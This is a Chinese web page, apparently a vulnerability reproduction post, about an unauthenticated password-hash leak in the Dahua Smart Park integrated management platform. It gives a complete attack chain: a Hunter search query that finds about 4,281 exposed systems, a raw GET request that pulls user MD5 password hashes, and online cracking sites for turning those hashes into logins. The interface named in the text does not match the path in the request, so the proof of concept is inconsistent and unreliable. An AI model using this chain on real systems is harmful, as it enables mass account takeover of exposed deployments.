大华智慧园区综合管理平台简介

大华智慧园区综合管理平台是一款综合管理平台，具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配，满足多元化的管理需求，同时通过提供智能服务，增强使用体验。由于该平台未对接口权限做限制，攻击者可以从user_getUserInfoByUserName.action接口获取任意用户密码(MD5格式)

影响范围

hunter语法

web.body="“/WPMS/asset/lib/gridster/”"
hunter共4,281条资产

（二） 漏洞poc

GET /defaultroot/evoInterfaceServlet?paramType=user HTTP/1.1
Host:

获取到登陆密码的MD5值去解密从而登陆系统

MD5解密网站：
https://www.somd5.com/
https://www.cmd5.com/

本栏目推荐文章
• 微信对话平台API开发
• OFBiz RCE漏洞复现（CVE-2023-51467）
• 解析Navicate密码
• 重置密码问题记录
• 养老数据监控大屏：科技赋能，让智慧养老触手可及
• [RFC6238] TOTP: 基于时间的一次性密码生成算法
• 基于 Aidlux的智慧教育版面分析场景下的实践
• 云平台大数据系统需求有哪些？
• ThingsKit 物联网平台 可视化规则引擎发布
• 通过设置ssh秘钥来免去繁琐的输入密码的过程

漏洞 园区 智慧 密码 平台漏洞 园区 智慧 密码 漏洞 园区 智慧 平台 漏洞 园区 智慧 文件 searchjson漏洞 园区 智慧 服务平台 园区 场景 智慧 智慧 开发者 园区 人物 灯杆 网关 园区 智慧 园区建设 园区 智慧 数字 园区 智慧 智能 方案 园区 智慧 关键 数字